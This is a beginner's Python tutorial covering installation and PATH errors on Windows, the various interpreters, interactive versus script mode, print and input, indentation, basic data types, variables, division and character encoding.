│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│'python' is not recognized as an internal or external co│
│mmand, operable program or batch file.                  │
│                                                        │
│C:\> _                                                  │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

This is because Windows will look for python.exe based on the path set by a Path environment variable, and if it doesn't find it, it will report an error. If you missed checking Add Python 3.8 to PATH during installation, you will have to manually add the path where python.exe is located to the Path.

If you don't know how to change the environment variables, we recommend running the Python installer again, making sure to check Add Python 3.8 to PATH.
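Once some Python interpreter does start, the search that Windows performs along Path can be reproduced from Python itself. This is only a sketch: it uses the standard library function shutil.which() to look for a program named python, and the result depends entirely on how your own machine is configured.

```python
import os
import shutil

# shutil.which() searches the directories listed in PATH, much like the shell does.
python_path = shutil.which("python")
if python_path is None:
    print("python was not found on PATH")
else:
    print("python found at:", python_path)

# Print each directory on PATH, one per line.
path_dirs = os.environ.get("PATH", "").split(os.pathsep)
for directory in path_dirs:
    print(directory)
```

If the directory that contains python.exe is missing from the printed list, that explains the error shown in Case 2.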

Python interpreter

When we write Python code, we get a text file with a .py extension that contains Python code. To run the code, a Python interpreter is needed to execute the .py file.

Since the entire Python language is open source, from the specification to the interpreter, theoretically anyone with a high enough level of proficiency could write a Python interpreter to execute Python code (with great difficulty, of course). In fact, multiple Python interpreters do exist.

CPython

When we download and install Python 3.x from the official Python website, we get the official interpreter: CPython. This interpreter is developed in C, hence the name CPython. Running python at the command line starts the CPython interpreter.

CPython is the most widely used Python interpreter. All the code in the tutorial is also executed under CPython.

IPython

IPython is an interactive interpreter based on CPython. That is, IPython only enhances the way you interact with the interpreter; the way it executes Python code is exactly the same as in CPython. It is like the many browsers that look different on the outside but call the same IE engine underneath.

CPython uses >>> as the prompt, while IPython uses In [serial number]: as the prompt.

PyPy

PyPy is another Python interpreter that targets execution speed. PyPy uses JIT technology to dynamically compile (note that it does not interpret) Python code, so it can significantly improve the execution speed of Python code.

The vast majority of Python code will run under PyPy, but PyPy and CPython differ in some respects, so the same Python code may produce different results under the two interpreters. If your code is going to be executed under PyPy, you need to understand the differences between PyPy and CPython.

Jython

Jython is a Python interpreter that runs on the Java platform and can compile Python code directly into Java bytecode for execution.

IronPython

IronPython is similar to Jython, except that IronPython is a Python interpreter that runs on the Microsoft .NET platform.

Summary

There are many interpreters for Python, but the most widely used is CPython. If you want to interact with Java or .NET, Jython and IronPython are the interpreters that target those platforms.

All code in this tutorial is guaranteed to run under CPython version 3.x only. Be sure to install CPython locally (that is, download the installer from the official Python website).
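If you are unsure which interpreter and version you are running, the standard library can tell you. A minimal sketch, in which the variable name implementation is chosen only for illustration:

```python
import platform
import sys

# Name of the running interpreter, for example CPython, PyPy, Jython or IronPython.
implementation = platform.python_implementation()
print(implementation)

# Major and minor version numbers of the running interpreter.
print(sys.version_info.major, sys.version_info.minor)
```

With a standard installation from the official Python website, the first line printed should be CPython.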

First Python program

Before we officially write our first Python program, let's review what command line mode and Python interaction mode are.

Command Line Mode

Select "Command Prompt" in the Windows Start menu to enter command line mode, which has a prompt similar to C:\>.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> _                                                  │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

Python interactive mode

Type the command python in command line mode. You will see some text output like the following, and then you will be in Python interactive mode, whose prompt is >>>.

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│Python 3.8 ... on win32                                 │
│Type "help", ... for more information.                  │
│>>> _                                                   │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

Typing exit() and pressing Enter in Python interactive mode exits it and returns you to command line mode:

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│Python 3.8 ... on win32                                 │
│Type "help", ... for more information.                  │
│>>> exit()                                              │
│                                                        │
│C:\> _                                                  │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

You can also select the Python (command line) item from the Start menu to enter Python interactive mode directly, but in that case the window closes after you type exit() instead of returning to command line mode.

Once we understand how to start and exit Python's interactive mode, we can officially start writing Python code.

Before writing code, a word of advice: never paste code from a page into your own computer using copy and paste. Type it yourself. While typing code, beginners often make mistakes such as incorrect spelling, incorrect capitalization, mixing English and Chinese punctuation, or mixing spaces and tabs. Checking and correcting these mistakes carefully is the fastest way to master writing programs.

At the interactive mode prompt >>>, type the code directly and press enter to get the code execution result immediately. Now, try typing 100+200 and see if the calculation results in 300.

>>> 100+200
300

Pretty simple, right? Any valid mathematical calculation will work out.

To get Python to print out the specified text, use the print() function and then enclose the text you wish to print in single or double quotes, but not a mix of single and double quotes:

>>> print('hello, world')
hello, world

This kind of text enclosed in single or double quotes is called a string in the program, and we will encounter it often in the future.

Finally, exit Python with exit() and our first Python program is done! The only downside is that it wasn't saved, so you'll have to type the code again the next time you run it.

Command line mode and Python interactive mode

Please note the distinction between command line mode and Python interactive mode.

In command line mode, you can execute python to enter the Python interactive environment, or you can execute python hello.py to run a .py file.

A .py file can only be executed in command line mode. If you type the command python hello.py, you may see the following error:

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python hello.py                                    │
│python: can't open file 'hello.py': [Errno 2] No such   │
│file or directory                                       │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

The error message No such file or directory indicates that hello.py was not found in the current directory. You must first switch the current directory to the directory where hello.py is located in order to run it properly.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> cd work                                            │
│                                                        │
│C:\work> python hello.py                                │
│Hello, world!                                           │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

In addition, running a .py file in command line mode is different from typing Python code directly in the Python interactive environment. The interactive environment automatically prints the result of each line of Python code, but running a .py file does not.

For example, in the Python interactive environment, type:

>>> 100 + 200 + 300
600

You can see the result 600 directly.

However, suppose you write a calc.py file with the following content:

100 + 200 + 300

Then, in command line mode, execute:

C:\work>python calc.py

Nothing is output.

This is normal. To output the result, you must print it yourself with print(). Change calc.py to:

print(100 + 200 + 300)

Executing it again, you can see the result.

C:\work>python calc.py
600

Finally, in Python interactive mode, code is typed and executed one line at a time, while running a .py file in command line mode executes all the code in the file at once. As you can see, Python interactive mode is mainly for debugging Python code and for beginners to learn; it is not the environment in which Python programs are normally run.
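The difference between the two versions of calc.py can also be checked from Python. The following is only a sketch: run_script is a hypothetical helper, not part of the tutorial, that saves some source text to a temporary calc.py, runs it with the current interpreter, and returns whatever the script printed.

```python
import os
import subprocess
import sys
import tempfile

def run_script(source):
    """Save source to a temporary calc.py, run it, and return what it printed."""
    with tempfile.TemporaryDirectory() as folder:
        script = os.path.join(folder, "calc.py")
        with open(script, "w", encoding="utf-8") as f:
            f.write(source)
        # sys.executable is the interpreter that is running this code.
        result = subprocess.run([sys.executable, script],
                                capture_output=True, text=True)
        return result.stdout

bare_output = run_script("100 + 200 + 300\n")
printed_output = run_script("print(100 + 200 + 300)\n")
print(repr(bare_output))      # empty: the bare expression prints nothing
print(repr(printed_output))   # contains 600 followed by a newline
```

The first script computes the sum and throws the result away; only the version that calls print() produces output.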

SyntaxError

If SyntaxError is encountered, it means that there is a syntax error in the input Python code. The most common type of syntax error is the use of Chinese punctuation, such as the use of Chinese brackets （ and ）.

>>> print（'hello'）
  File "<stdin>", line 1
    print（'hello'）
         ^
SyntaxError: invalid character '（' (U+FF08)

Or the Chinese quotation marks “ and ” are used.

>>> print(“hello”)
  File "<stdin>", line 1
    print(“hello”)
          ^
SyntaxError: invalid character '“' (U+201C)

When an error occurs, be sure to read the cause of the error. For the above SyntaxError, the interpreter explicitly states the cause: invalid character '“' (U+201C), meaning that the character “ is not recognized.
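The same error can be reproduced without crashing a program by asking Python to compile a piece of source text and catching the exception. This is a sketch using the built-in compile() function; the exact wording of the message varies between Python versions, so no particular message is assumed here.

```python
# Source text containing full-width (Chinese) parentheses instead of ( and ).
source = "print（'hello'）"

try:
    compile(source, "<example>", "exec")
    error = None
except SyntaxError as exc:
    error = exc
    print("SyntaxError:", exc.msg)
```

Replacing the two full-width parentheses with ordinary ones makes the source compile without error.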

Summary

In Python interactive mode, you can type code directly, then execute it and get the result immediately.

In command line mode, you can run the .py file directly.

Using a text editor

The advantage of writing a program on Python's interactive command line is that you get the result immediately. The disadvantage is that the code is not saved, so you have to type it again the next time you want to run it.

So, in practice, we always use a text editor to write the code, and when we're done, we save it as a file so that the program can be run again and again.

Now, let's take the last 'hello, world' program and write it in a text editor and save it.

So here's the question: which is the best text editor?

Visual Studio Code!

We recommend Visual Studio Code from Microsoft. It is not the full Visual Studio but a lightweight editor, and it is cross-platform: it works on Windows, Mac, and Linux.

Please do not use Word or Windows Notepad. Word does not save plain text files, and Notepad may add a few special characters (a UTF-8 BOM) at the beginning of the file, which can cause puzzling errors when the program is run.
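To make the BOM less mysterious: it is three invisible bytes placed in front of the text. The sketch below uses Python's standard "utf-8-sig" codec, which writes and strips a BOM, to show the difference; the variable names are chosen only for illustration.

```python
import codecs

code = "print('hello, world')"
plain = code.encode("utf-8")          # no BOM
with_bom = code.encode("utf-8-sig")   # the "utf-8-sig" codec prepends a BOM

print(codecs.BOM_UTF8)                    # the three BOM bytes
print(with_bom[:3] == codecs.BOM_UTF8)    # True
print(len(with_bom) - len(plain))         # 3 extra bytes

# Decoding with "utf-8-sig" strips the BOM again.
print(with_bom.decode("utf-8-sig") == code)   # True
```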

With the text editor installed, enter the following code.

print('hello, world')

Note that there should not be any spaces in front of print. Then choose a directory, for example C:\work, and save the file as hello.py. Open a command line window, switch the current directory to the directory where hello.py is located, and run the program as follows:

C:\work> python hello.py
hello, world

It can also be saved as another name, such as first.py, but it must end with .py, nothing else will work. In addition, the file name can only be a combination of letters, numbers, and underscores.

If there is no hello.py file in the current directory, running python hello.py will report the following error.

C:\Users\IEUser> python hello.py
python: can't open file 'hello.py': [Errno 2] No such file or directory

The error means that the file hello.py cannot be opened because it does not exist. In this case, you have to check whether the file exists in the current directory. If hello.py is stored in another directory, first switch to that directory with the cd command.

Inputs and Outputs

Output

Using print() with a string in parentheses, you can output the specified text to the screen. For example, outputting 'hello, world' is implemented in code as follows.

>>> print('hello, world')

The print() function can also accept multiple strings, separated by a comma ",", which can be concatenated into one string of output.

>>> print('The quick brown fox', 'jumps over', 'the lazy dog')
The quick brown fox jumps over the lazy dog

print() prints each string in turn and outputs a space wherever a comma "," separates two arguments, so the three strings above are joined into a single line of output.

print() can also print an integer, or the result of a calculation.

>>> print(300)
300
>>> print(100 + 200)
300

Therefore, we can print the result of calculating 100 + 200 a little more nicely as follows.

>>> print('100 + 200 =', 100 + 200)
100 + 200 = 300

Note that the Python interpreter evaluates 100 + 200 and obtains the result 300, whereas '100 + 200 =' is a string rather than a mathematical expression, so Python prints it unchanged. Try to explain the printout above for yourself.
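The space that print() inserts between its arguments can be compared with joining the strings by hand. This sketch also shows the sep and end keyword arguments of print(), which the text above does not cover; the list name parts and the sample date are only illustrative.

```python
parts = ['The quick brown fox', 'jumps over', 'the lazy dog']

# Passing several arguments: print() puts one space between them.
print(parts[0], parts[1], parts[2])

# Building the same line by hand with str.join() gives identical text.
line = ' '.join(parts)
print(line)

# sep changes the separator; end changes what is written after the last item.
print('2020', '01', '31', sep='-')
print('no newline here', end='')
print(' <- continues on the same line')
```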

Input

Now, you can already output the result you want with print(). But what if you want the user to enter some characters from the keyboard? Python provides the input() function, which lets the user enter a string that can then be stored in a variable. For example, to read the user's name:

>>> name = input()
Michael

Once you type name = input() and hit enter, the Python interactive command line is waiting for your input. At this point, you can type any character you want, then press enter and finish typing.

When you're done, there's no prompt, and the Python interactive command line goes back to >>>. So where does the content we just typed go? The answer is that it is stored in the name variable. You can see the contents of the variable by typing name directly.

>>> name
'Michael'

What is a variable? Recall the basics of algebra learned in junior high school mathematics.

Let the side length of a square be a, then the area of the square is a x a. Thinking of the side length a as a variable, we can calculate the area of the square based on the value of a, e.g.

If a = 2, the area is a x a = 2 x 2 = 4.

If a = 3.5, then the area is a x a = 3.5 x 3.5 = 12.25.

In computer programs, variables can be not only integers or floating point numbers, but also strings, so name as a variable is a string.

To print out the contents of the name variable, in addition to writing name directly and pressing enter, the print() function can be used.

>>> print(name)
Michael

With input and output, we can change the last program that printed 'hello, world' into something that makes a little more sense:

name = input()
print('hello,', name)

Running the above program, the first line of code will ask the user to enter any character as his or her name, which will then be stored in the name variable; the second line of code will say hello to the user based on his or her name, for example, enter Michael.

C:\Workspace> python hello.py
Michael
hello, Michael

But the program runs without any prompt message telling the user: "Hey, hurry up and enter your name", which seems very unfriendly. Fortunately, input() allows you to display a string to prompt the user, so we changed the code to:

name = input('please enter your name: ')
print('hello,', name)

Run the program again and you will find that as soon as the program runs, it will first print out please enter your name: so that the user can follow the prompt and enter the name and get the output of hello, xxx as follows:

C:\Workspace> python hello.py
please enter your name: Michael
hello, Michael

Each time you run the program, the output will be different depending on the user input.

At the command line, input and output are just that simple.
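One detail worth keeping in mind is that input() always returns a string, even when the user types digits. The following is a minimal sketch of converting that string with int() before doing arithmetic. The helper years_until_100 is hypothetical, and a fixed sample value stands in for keyboard input so that the example runs without waiting for the user.

```python
def years_until_100(age_text):
    """Convert the text typed by the user to an integer, then do arithmetic."""
    age = int(age_text)
    return 100 - age

# A fixed sample stands in for: age_text = input('please enter your age: ')
age_text = '18'
print(age_text + age_text)        # string concatenation, prints 1818
print(years_until_100(age_text))  # integer arithmetic, prints 82
```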

Summary

Any computer program is designed to perform a specific task. With input, the user can tell the computer program the information it needs, and with output, the program runs and tells the user the result of the task.

We refer to input and output collectively as Input/Output, abbreviated as IO.

input() and print() are the most basic forms of input and output at the command line, but users can also perform input and output through more advanced graphical interfaces, for example, typing a name in a text box on a web page, clicking "OK", and seeing the output on the web page.

Python Programming Quick Guide - Syntax

https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832

https://docs.python.org/3/tutorial/index.html

Python Basics

Python is a computer programming language. A computer programming language is different from the natural language we use every day. The biggest difference is that natural language can be understood differently in different contexts, whereas a program must be unambiguous if the computer is to carry out its task exactly as written. Python is no exception.

Python's syntax is relatively simple. It uses indentation, and code looks like the following:

# print absolute value of an integer:
a = 100
if a >= 0:
    print(a)
else:
    print(-a)

Statements starting with # are comments, which are for human eyes and can be anything, and are ignored by the interpreter. Every other line is a statement, and when the statement ends with a colon :, the indented statement is considered a block of code.

Indentation has advantages and disadvantages. The advantage is that it forces you to write well-formatted code. However, the language has no rule about whether an indent is a few spaces or a tab. By convention, you should always stick to a 4-space indent.

Another advantage of indentation is that it forces you to write less indented code, and you will tend to split a long piece of code into several functions to get less indented code.

The downside of indentation is that copy-paste becomes unreliable, which is the worst part. When you refactor your code, pasted code has to be rechecked for correct indentation. In addition, it is hard for an IDE to reformat Python code the way it reformats Java code.

Finally, be sure to note that Python programs are case-sensitive, and if you write the wrong case, the program will report an error.

Summary

Python uses indentation to organize blocks of code, so be sure to follow the convention and stick to a 4-space indent.

In the text editor, you need to set up the automatic conversion of tabs to 4 spaces to make sure you don't mix tabs and spaces.
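What happens when the indentation is wrong can be observed safely with the built-in compile() function, which checks source text without running it. This is a sketch: check is a hypothetical helper, and the three source strings are made up for illustration.

```python
def check(source):
    """Try to compile source and return the name of the error, or 'ok'."""
    try:
        compile(source, "<example>", "exec")
        return "ok"
    except IndentationError as exc:
        # TabError is a subclass of IndentationError, so it is caught here too.
        return type(exc).__name__

good = "if True:\n    print('yes')\n"
missing_indent = "if True:\nprint('yes')\n"
mixed = "if True:\n\tprint('a')\n        print('b')\n"   # a tab, then 8 spaces

print(check(good))             # ok
print(check(missing_indent))   # IndentationError
print(check(mixed))            # an indentation-related error, typically TabError
```

The third case is the reason for configuring the editor to convert tabs to spaces: the two lines look aligned on screen, yet Python refuses to guess how wide a tab is.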

Data types and variables

Data types

A computer is, as the name implies, a machine that can do mathematical calculations, so it is logical that computer programs can handle all kinds of numerical values. However, computers can handle much more than just numeric values. They can also handle text, graphics, audio, video, web pages, and a wide variety of other data, and different data requires different data types to be defined. In Python, the data types that can be handled directly are as follows.

integers

Python can handle integers of any size, including negative integers of course, represented in programs exactly as they are written in mathematics, for example: 1, 100, -8080, 0, and so on.

Since computers use binary, it is sometimes easier to represent integers in hexadecimal, which is represented by the 0x prefix and 0-9, a-f, for example: 0xff00, 0xa5b4c3d2, and so on.

For very large numbers, such as 10000000000, it is difficult to count the number of zeros. Python allows the digits to be separated by _, so writing 10_000_000_000 is exactly the same as 10000000000. Hexadecimal numbers can also be written this way, for example 0xa1b2_c3d4.
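The three points about integers (arbitrary size, hexadecimal notation, and underscores as separators) can be tried out directly. A short sketch, with the variable name big chosen only for illustration:

```python
big = 2 ** 100                 # far beyond 64 bits, still exact
print(big)

print(0xff00)                  # hexadecimal literal, prints 65280
print(10_000_000_000 == 10000000000)   # True
print(0xa1b2_c3d4 == 0xa1b2c3d4)       # True
print(hex(255))                # prints 0xff
```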

floating point numbers

Floating point numbers, also known as decimals, are called floating point numbers because the position of the decimal point is variable when the number is expressed in scientific notation; for example, 1.23 x 10^9 is exactly the same as 12.3 x 10^8. Floating point numbers can be written in the usual mathematical way, such as 1.23, 3.14, -9.01, and so on. Very large or very small floating point numbers are written in scientific notation, replacing 10 with e: 1.23 x 10^9 is 1.23e9 or 12.3e8, 0.000012 can be written as 1.2e-5, and so on.

Integers and floating point numbers are stored differently inside the computer. Integer operations are always exact (is division also exact? Yes, integer floor division with // is exact), while floating-point operations may have rounding errors.
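A few lines are enough to see both claims: integer arithmetic is exact, while floating-point arithmetic can be off by a tiny amount. This is a sketch; the tolerance 1e-9 is an arbitrary choice for illustration.

```python
print(1.23e9 == 12.3e8)   # True: two spellings of the same number
print(1.2e-5)             # prints 1.2e-05

print(10 // 3)            # floor division of integers, prints 3
print(10 % 3)             # remainder, prints 1

total = 0.1 + 0.2
print(total == 0.3)       # False, because of a rounding error
print(abs(total - 0.3) < 1e-9)   # True: compare with a small tolerance instead
```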

strings

A string is any text enclosed in single quotes ' or double quotes ", such as 'abc' or "xyz". Note that the quotes themselves are only delimiters, not part of the string, so the string 'abc' has only the 3 characters a, b, c. If ' itself is one of the characters, the string can be enclosed in "", for example, "I'm OK" contains the 6 characters I, ', m, space, O, and K.

What if the string contains both ' and " inside? You can use the escape character \ to identify it, for example.

'I\'m \"OK\"!'

The content of the string represented is:

I'm "OK"!

The escape character \ can escape many characters, such as \n for line feeds, \t for tabs, and the character \ itself should be escaped, so the character represented by \\ is \. You can use print() on Python's interactive command line to print the string to see.

>>> print('I\'m ok.')
I'm ok.
>>> print('I\'m learning\nPython.')
I'm learning
Python.
>>> print('\\\n\\')
\
\

If there are many characters inside the string that need to be escaped, you need to add a lot of \. For simplicity, Python also allows r'' to indicate that the string inside '' is not escaped by default. Try it yourself:

>>> print('\\\t\\')
\       \
>>> print(r'\\\t\\')
\\\t\\

If there are many newlines inside the string, writing them on one line with \n is hard to read. For simplicity, Python allows the '''...''' format to represent multiple lines of content. Try it yourself:

>>> print('''line1
... line2
... line3''')
line1
line2
line3

The above is typed within the interactive command line. Note that when typing multiple lines, the prompt changes from >>> to ..., prompting you to continue the previous line. The ... is a prompt, not part of the code.

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           _ □ x │
├────────────────────────────────────────────────────────┤
│>>> print('''line1                                      │
│... line2                                               │
│... line3''')                                           │
│line1                                                   │
│line2                                                   │
│line3                                                   │
│                                                        │
│>>> _                                                   │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

When the terminator ''' and the closing parenthesis ) have been entered, the statement is executed and the result is printed.

If written as a program and saved as a .py file, it would be:

print('''line1
line2
line3''')

The multi-line string '''...''' can also be used with r in front. Please test it yourself:

# -*- coding: utf-8 -*-
print(r'''hello,\n
world''')
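Counting characters with the built-in len() function is a quick way to confirm what escaping does and does not add to a string. A small sketch using the examples from this section; the variable names s and multi are chosen only for illustration.

```python
s = 'I\'m \"OK\"!'
print(s)          # prints I'm "OK"!
print(len(s))     # 9 characters; the backslashes are not part of the string

print(len('\t'))   # 1: a single tab character
print(len(r'\t'))  # 2: a backslash followed by the letter t

multi = '''line1
line2
line3'''
print(multi == 'line1\nline2\nline3')   # True
```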

Boolean values

Boolean values correspond exactly to those of Boolean algebra. A Boolean value is either True or False. In Python, a Boolean value can be written directly as True or False (please note the capitalization), or it can be produced by a Boolean expression, as follows:

>>> True
True
>>> False
False
>>> 3 > 2
True
>>> 3 > 5
False

Boolean values can be operated on with and, or and not.

The and operation is logical conjunction: the result is True only if both operands are True.

>>> True and True
True
>>> True and False
False
>>> False and False
False
>>> 5 > 3 and 3 > 1
True

The or operation is logical disjunction: as long as one of the operands is True, the result is True.

>>> True or True
True
>>> True or False
True
>>> False or False
False
>>> 5 > 3 or 1 > 3
True

The not operation is logical negation; it is a unary operator that turns True into False and False into True.

>>> not True
False
>>> not False
True
>>> not 1 > 2
True

Boolean values are often used in conditional judgments, e.g.

age = 20  # example value, chosen only so that the snippet runs on its own
if age >= 18:
    print('adult')
else:
    print('teenager')
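The rules for and and or given above can be summarized as a truth table, which a short loop can print. This is only a sketch; the list name table is chosen for illustration.

```python
# Each row holds: a, b, a and b, a or b
table = []
for a in (True, False):
    for b in (True, False):
        table.append((a, b, a and b, a or b))
        print(a, b, '| and:', a and b, '| or:', a or b)

# not binds less tightly than comparisons, so these two are the same:
print(not 1 > 2)      # True
print(not (1 > 2))    # True
```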

Null values

A null value is a special value in Python, denoted by None. None cannot be interpreted as 0, because 0 is meaningful, and None is a special null value.

In addition, Python provides a variety of data types, such as lists and dictionaries, and also allows the creation of custom data types, which we will continue to talk about later.
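That None is a value of its own, distinct from 0, can be checked directly. The sketch below also shows one place where None turns up naturally: print() returns it. The variable name result is chosen only for illustration.

```python
print(None == 0)       # False: None is not the number 0
print(None == '')      # False: None is not an empty string either
print(None is None)    # True: "is" is the usual way to test for None

result = print('hello')   # print() shows its text but returns no useful value
print(result)             # prints None
```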

Variables

The concept of a variable is basically the same as the equation variable in middle school algebra, except that in computer programs, variables can be not only numbers, but also arbitrary data types.

Variables are represented in the program by a variable name, which must be a combination of upper and lower case English letters, digits, and _, and cannot start with a digit. For example:

a = 1

The variable a is an integer.

t_007 = 'T007'

The variable t_007 is a string.

Answer = True

The variable Answer is a Boolean value True.

In Python, the equal sign = denotes assignment. Any data type can be assigned to a variable, and the same variable can be assigned repeatedly, even with values of different types. For example:

# -*- coding: utf-8 -*-
a = 123 # a is an integer
print(a)
a = 'ABC' # a becomes a string
print(a)

This type of language where the type of the variable itself is not fixed is called a dynamic language, and its counterpart is a static language. Static languages must specify the variable type when defining a variable, and will report an error if the type does not match when assigning a value. For example, Java is a static language, and the assignment statement is as follows (// indicates a comment)

int a = 123; // a is an integer type variable
a = "ABC"; // Error: You cannot assign a string to an integer variable

Dynamic languages are more flexible compared to static languages for this reason.
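In Python, the built-in type() function makes this flexibility visible: the type belongs to the value, so the same variable name reports a different type after each assignment. A minimal sketch, with first_type and second_type as illustrative names:

```python
a = 123
print(type(a))      # <class 'int'>
first_type = type(a)

a = 'ABC'
print(type(a))      # <class 'str'>
second_type = type(a)
```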

Please don't equate the equal sign of an assignment statement with the equal sign of mathematics. For example, the following code.

x = 10
x = x + 2

Read mathematically, x = x + 2 can never be true. In a program, however, the assignment statement first evaluates the expression x + 2 on the right side, gets the result 12, and then assigns it to the variable x. Since the previous value of x was 10, the value of x becomes 12 after the reassignment.

Finally, it is also important to understand how variables are represented in computer memory. When we write:

a = 'ABC'

Here the Python interpreter does two things:

It creates the string 'ABC' in memory.
It creates a variable named a in memory and points it to 'ABC'.

It is also possible to assign a variable a to another variable b. This operation actually points b to the data that a points to, as in the following code:

# -*- coding: utf-8 -*-
a = 'ABC'
b = a
a = 'XYZ'
print(b)

Does the last line print the contents of variable b as 'ABC' or as 'XYZ'? Read mathematically, one would incorrectly conclude that b is the same as a and should also be 'XYZ'. In fact, the value of b is 'ABC'. Let's execute the code line by line to see what is really happening.

Executing a = 'ABC', the interpreter creates the string 'ABC' and the variable a, and points a to 'ABC'.

Executing b = a, the interpreter creates the variable b and points b to the string 'ABC' pointed to by a.

Executing a = 'XYZ', the interpreter creates the string 'XYZ' and changes a to point to 'XYZ', but b does not change.

So, the final result of printing the variable b will naturally be 'ABC'.
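
The same walk-through can be checked with the is operator, which tests whether two names refer to the same object. This is a minimal sketch; same_before and same_after are illustrative names only.

```python
a = 'ABC'
b = a
same_before = a is b   # both names refer to one string object

a = 'XYZ'              # rebinding a does not touch b
same_after = a is b

print(same_before, same_after, b)   # True False ABC
```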

Constants

A constant is a value that is not meant to change; the mathematical constant π is a common example. In Python, constants are usually written with all-caps variable names:

PI = 3.14159265359

In fact, PI is still a variable, and Python has no mechanism to ensure that PI won't be changed. Using all-caps names for constants is only a convention; if you insist on changing the value of PI, nothing will stop you.

Finally, an explanation of why integer division is also exact. Python has two kinds of division. The first is /:

>>> 10 / 3
3.3333333333333335

The result of / is always a floating-point number, even when the two integers divide exactly:

>>> 9 / 3
3.0

Another type of division is //, called floor division, where the division of two integers remains an integer:

>>> 10 // 3
3

You read that right: floor division of two integers with // always yields an integer, even when the division is not exact. To do exact division, use /.

Because // keeps only the integer part of the result, Python also provides the remainder operator %, which gives the remainder of dividing two integers:

>>> 10 % 3
1

Whether an integer does // division or takes a remainder, the result is always an integer, so the result of integer arithmetic is always exact.
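
As a quick check of the relationship between // and %, the sketch below also uses the built-in divmod(), which returns both results at once. The variable names are illustrative. Note that // rounds toward negative infinity, which matters for negative operands.

```python
quotient = 10 // 3        # floor division
remainder = 10 % 3        # remainder
q, r = divmod(10, 3)      # built-in that returns both values together

print(quotient, remainder)        # 3 1
print(quotient * 3 + remainder)   # 10: the dividend is recovered exactly

# Floor division rounds down, so a negative result moves away from zero.
neg_quotient = -10 // 3
neg_remainder = -10 % 3
print(neg_quotient, neg_remainder)   # -4 2
```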

Summary

Python supports a variety of data types, and within the computer, any data can be thought of as an "object", and variables are used in programs to point to these data objects.

The assignment x = y points the variable x to the object that the variable y points to. Subsequent assignments to y do not affect what x points to.

Note: Python's integers have no size limit, while some languages limit integers according to their storage length. For example, Java limits 32-bit integers to the range -2147483648 to 2147483647.

Python's floating-point numbers do have a finite range (up to about 1.8e308 on typical platforms); a result beyond that range is represented as inf (infinity).
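
Both behaviours are easy to observe. The following is a small sketch with illustrative variable names; math.isinf() is the standard-library check for infinity.

```python
import math

big = 2 ** 100               # far beyond the 64-bit range, still exact
print(big)                   # 1267650600228229401496703205376

overflow = 1e308 * 10        # too large for a float
print(overflow)              # inf
print(math.isinf(overflow))  # True
```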

String and encoding

Character encoding

As we have already talked about, strings are also a data type, but what is special about strings is that there is also an encoding problem.

Because computers can only process numbers, text must first be converted to numbers before it can be processed. Early computers were designed with 8 bits to a byte, so the largest integer that one byte can represent is 255 (binary 11111111 = decimal 255), and larger integers need more bytes. For example, the largest integer that can be represented by two bytes is 65535, and the largest that can be represented by four bytes is 4294967295.

Since the computer was invented in the United States, only 128 characters were encoded at first: upper- and lower-case English letters, digits, and some symbols. This code table is called ASCII. For example, the code for the upper-case letter A is 65 and the code for the lower-case letter z is 122.

But one byte is obviously not enough to handle Chinese; at least two bytes are needed, and the encoding must not conflict with ASCII. China therefore developed the GB2312 encoding for Chinese.

As you can imagine, there are hundreds of languages in the world. Japan encodes Japanese in Shift_JIS, Korea encodes Korean in EUC-KR, and each country has its own standard, so conflicts are inevitable and text that mixes several languages ends up garbled.

As a result, the Unicode character set was created. Unicode unifies all languages into one set of encodings, so the garbling problem goes away.

The Unicode standard continues to evolve. A commonly used encoding is UTF-16, which uses two bytes for most characters (four bytes are needed for rarer characters). Unicode is directly supported by modern operating systems and most programming languages.

Now, let's run through the differences between ASCII and Unicode encoding: ASCII uses 1 byte per character, while Unicode usually uses 2 bytes.

The letter A is 65 in decimal and 01000001 in binary with ASCII encoding.

The character 0 in ASCII encoding is 48 in decimal and 00110000 in binary, noting that the character '0' is different from the integer 0.

The Chinese character 中 is beyond the scope of ASCII encoding and is 20013 in decimal and 01001110 00101101 in binary using Unicode encoding.

You can guess that to encode the ASCII-encoded A in Unicode, you only need to pad it with zeros in front, so the Unicode encoding of A is 00000000 01000001.
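
These binary values can be reproduced with ord() and format(). The sketch below assumes a 16-bit display width to match the two-byte view used above; to_bits is a hypothetical helper name, not something from the original text.

```python
def to_bits(ch):
    """Hypothetical helper: the code point of ch as a 16-digit binary string."""
    return format(ord(ch), '016b')

# '\u4e2d' is the character 中 written as a hexadecimal escape.
for ch in ('A', '0', '\u4e2d'):
    print(ord(ch), to_bits(ch))
# 65 0000000001000001
# 48 0000000000110000
# 20013 0100111000101101
```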

